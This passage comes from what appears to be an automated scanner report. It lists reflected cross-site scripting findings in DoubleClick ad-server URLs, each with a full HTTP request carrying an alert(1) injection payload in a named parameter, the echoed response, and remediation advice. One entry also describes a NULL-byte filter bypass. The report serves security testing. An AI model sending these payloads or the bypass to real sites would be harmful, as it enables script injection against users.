User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 22:04:43 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6954

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Mon Apr 25 13:48:26 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
94441%3B4307-300/250%3B41864997/41882784/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs511443%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=16047&sg=511443&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001e1502"-alert(1)-"5e7d2cb2fac&nd=22408&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbiQ3wq0Ht4AAD5KFuA&t=2011.
...[SNIP]...

3.73. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473103.2 [ra parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3220.cbssports.comOX5267/B5473103.2

Issue detail

The value of the ra request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7e515"-alert(1)-"3d7d685553c was submitted in the ra parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3220.cbssports.comOX5267/B5473103.2;sz=300x250;pc=cbs511443;click0=http://adlog.com.com/adlog/e/r=16047&sg=511443&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.2437e515"-alert(1)-"3d7d685553c&pg=TbiQ3wq0Ht4AAD5KFuA&t=2011.04.27.21.55.50&event=58/;ord=2011.04.27.21.55.50? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 22:10:06 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6954

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Mon Apr 25 13:48:26 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.2437e515"-alert(1)-"3d7d685553c&pg=TbiQ3wq0Ht4AAD5KFuA&t=2011.04.27.21.55.50&event=58/http://www.mostlivesports.com/?dfaid=2199899&cmp=0");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
v
...[SNIP]...

3.74. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473103.2 [rqid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3220.cbssports.comOX5267/B5473103.2

Issue detail

The value of the rqid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2e5b4"-alert(1)-"68037134f06 was submitted in the rqid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3220.cbssports.comOX5267/B5473103.2;sz=300x250;pc=cbs511443;click0=http://adlog.com.com/adlog/e/r=16047&sg=511443&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A2e5b4"-alert(1)-"68037134f06&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbiQ3wq0Ht4AAD5KFuA&t=2011.04.27.21.55.50&event=58/;ord=2011.04.27.21.55.50? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 22:07:10 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6954

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Mon Apr 25 13:48:26 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
c%3Dcbs511443%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=16047&sg=511443&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A2e5b4"-alert(1)-"68037134f06&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbiQ3wq0Ht4AAD5KFuA&t=2011.04.27.21.55.50&event=58/http://www.mostlivesports.com/?dfaid=
...[SNIP]...

3.75. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473103.2 [sg parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3220.cbssports.comOX5267/B5473103.2

Issue detail

The value of the sg request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1a341"-alert(1)-"39b94f25674 was submitted in the sg parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3220.cbssports.comOX5267/B5473103.2;sz=300x250;pc=cbs511443;click0=http://adlog.com.com/adlog/e/r=16047&sg=5114431a341"-alert(1)-"39b94f25674&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbiQ3wq0Ht4AAD5KFuA&t=2011.04.27.21.55.50&event=58/;ord=2011.04.27.21.55.50? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 21:59:42 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6954

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Mon Apr 25 13:48:26 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
t/click%3Bh%3Dv8/3af6/17/169/%2a/i%3B240391556%3B0-0%3B0%3B63194441%3B4307-300/250%3B41864997/41882784/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs511443%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=16047&sg=5114431a341"-alert(1)-"39b94f25674&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmo
...[SNIP]...

3.76. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473103.2 [site parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3220.cbssports.comOX5267/B5473103.2

Issue detail

The value of the site request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5eff5"-alert(1)-"d2ad32e2576 was submitted in the site parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3220.cbssports.comOX5267/B5473103.2;sz=300x250;pc=cbs511443;click0=http://adlog.com.com/adlog/e/r=16047&sg=511443&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=1755eff5"-alert(1)-"d2ad32e2576&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbiQ3wq0Ht4AAD5KFuA&t=2011.04.27.21.55.50&event=58/;ord=2011.04.27.21.55.50? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 22:04:17 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6954

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Mon Apr 25 13:48:26 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
B0%3B63194441%3B4307-300/250%3B41864997/41882784/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs511443%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=16047&sg=511443&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=1755eff5"-alert(1)-"d2ad32e2576&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbiQ3wq0Ht4AAD5KFuA
...[SNIP]...

3.77. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473103.2 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3220.cbssports.comOX5267/B5473103.2

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7f109"-alert(1)-"4d12fd2ad5e was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3220.cbssports.comOX5267/B5473103.2;sz=300x250;pc=cbs511443;click0=http://adlog.com.com/adlog/e/r=160477f109"-alert(1)-"4d12fd2ad5e&sg=511443&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbiQ3wq0Ht4AAD5KFuA&t=2011.04.27.21.55.50&event=58/;ord=2011.04.27.21.55.50? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 21:59:07 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6954

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Mon Apr 25 13:48:26 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
leclick.net/click%3Bh%3Dv8/3af6/17/169/%2a/i%3B240391556%3B0-0%3B0%3B63194441%3B4307-300/250%3B41864997/41882784/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs511443%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=160477f109"-alert(1)-"4d12fd2ad5e&sg=511443&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports
...[SNIP]...

3.78. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473103.2 [t parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3220.cbssports.comOX5267/B5473103.2

Issue detail

The value of the t request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e8539"-alert(1)-"17e7812c6e was submitted in the t parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3220.cbssports.comOX5267/B5473103.2;sz=300x250;pc=cbs511443;click0=http://adlog.com.com/adlog/e/r=16047&sg=511443&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbiQ3wq0Ht4AAD5KFuA&t=2011.04.27.21.55.50e8539"-alert(1)-"17e7812c6e&event=58/;ord=2011.04.27.21.55.50? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 22:10:50 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6950

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Mon Apr 25 13:48:26 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
&cid=&pp=100&e=&rqid=00phx1-ad-e9:4DB7F78C5E91A&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbiQ3wq0Ht4AAD5KFuA&t=2011.04.27.21.55.50e8539"-alert(1)-"17e7812c6e&event=58/http://www.mostlivesports.com/?dfaid=2199899&cmp=0");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var open
...[SNIP]...

3.79. http://ad.doubleclick.net/adi/N4581.811.CBSPUBLISHER/B2336781 [count parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4581.811.CBSPUBLISHER/B2336781

Issue detail

The value of the count request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6e22b"-alert(1)-"4bbc9e4800b was submitted in the count parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N4581.811.CBSPUBLISHER/B2336781;sz=300x250;click0=http://adlog.com.com/adlog/e/r=13185&sg=506741&o=12457%253A&h=cn&p=&b=21&l=&site=50&pt=2001&nd=12457&pid=&cid=&pp=100&e=&rqid=01c13-ad-e2:4DB7F9EEA10D5E&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=6e22b"-alert(1)-"4bbc9e4800b&ra=173.193.214.243&pg=&t=2011.04.27.21.56.00&event=58/;ord=2011.04.27.21.56.00? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.metacritic.com/games/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 22:08:52 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5579

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Fla
...[SNIP]...
g.com.com/adlog/e/r=13185&sg=506741&o=12457%253A&h=cn&p=&b=21&l=&site=50&pt=2001&nd=12457&pid=&cid=&pp=100&e=&rqid=01c13-ad-e2:4DB7F9EEA10D5E&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=6e22b"-alert(1)-"4bbc9e4800b&ra=173.193.214.243&pg=&t=2011.04.27.21.56.00&event=58/http://www.newegg.com?nm_mc=ExtBanner&cm_mmc=BAC-CBSBrand-_-14MillionGeeks-_-NA-_-NA");
var wmode = "opaque";
var bg = "same as SWF";
var dcallows
...[SNIP]...

3.80. http://ad.doubleclick.net/adi/N4581.811.CBSPUBLISHER/B2336781 [h parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4581.811.CBSPUBLISHER/B2336781

Issue detail

The value of the h request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f4856"-alert(1)-"43dc123b662 was submitted in the h parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N4581.811.CBSPUBLISHER/B2336781;sz=300x250;click0=http://adlog.com.com/adlog/e/r=13185&sg=506741&o=12457%253A&h=cnf4856"-alert(1)-"43dc123b662&p=&b=21&l=&site=50&pt=2001&nd=12457&pid=&cid=&pp=100&e=&rqid=01c13-ad-e2:4DB7F9EEA10D5E&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.21.56.00&event=58/;ord=2011.04.27.21.56.00? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.metacritic.com/games/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 22:01:48 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5579

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Fla
...[SNIP]...
doubleclick.net/click%3Bh%3Dv8/3af6/17/127/%2a/c%3B237718223%3B0-0%3B0%3B61055221%3B4307-300/250%3B40719066/40736853/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=13185&sg=506741&o=12457%253A&h=cnf4856"-alert(1)-"43dc123b662&p=&b=21&l=&site=50&pt=2001&nd=12457&pid=&cid=&pp=100&e=&rqid=01c13-ad-e2:4DB7F9EEA10D5E&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.21.56.00&event=5
...[SNIP]...

3.81. http://ad.doubleclick.net/adi/N4581.811.CBSPUBLISHER/B2336781 [oepartner parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4581.811.CBSPUBLISHER/B2336781

Issue detail

The value of the oepartner request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %00c801b"-alert(1)-"acd16220e0c was submitted in the oepartner parameter. This input was echoed as c801b"-alert(1)-"acd16220e0c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /adi/N4581.811.CBSPUBLISHER/B2336781;sz=300x250;click0=http://adlog.com.com/adlog/e/r=13185&sg=506741&o=12457%253A&h=cn&p=&b=21&l=&site=50&pt=2001&nd=12457&pid=&cid=&pp=100&e=&rqid=01c13-ad-e2:4DB7F9EEA10D5E&orh=&oepartner=%00c801b"-alert(1)-"acd16220e0c&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.21.56.00&event=58/;ord=2011.04.27.21.56.00? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.metacritic.com/games/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 5461
Cache-Control: no-cache
Pragma: no-cache
Date: Wed, 27 Apr 2011 22:07:24 GMT
Expires: Wed, 27 Apr 2011 22:07:24 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Fla
...[SNIP]...
/41779349/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=13185&sg=506741&o=12457%253A&h=cn&p=&b=21&l=&site=50&pt=2001&nd=12457&pid=&cid=&pp=100&e=&rqid=01c13-ad-e2:4DB7F9EEA10D5E&orh=&oepartner=%00c801b"-alert(1)-"acd16220e0c&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.21.56.00&event=58/http://promotions.newegg.com/Gazelle/11-0737/index.html?nm_mc=ExtBanner&cm_mmc=BAC-CBSBrand-_-1Ton-_-0
...[SNIP]...

3.82. http://ad.doubleclick.net/adi/N4581.811.CBSPUBLISHER/B2336781 [pid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4581.811.CBSPUBLISHER/B2336781

Issue detail

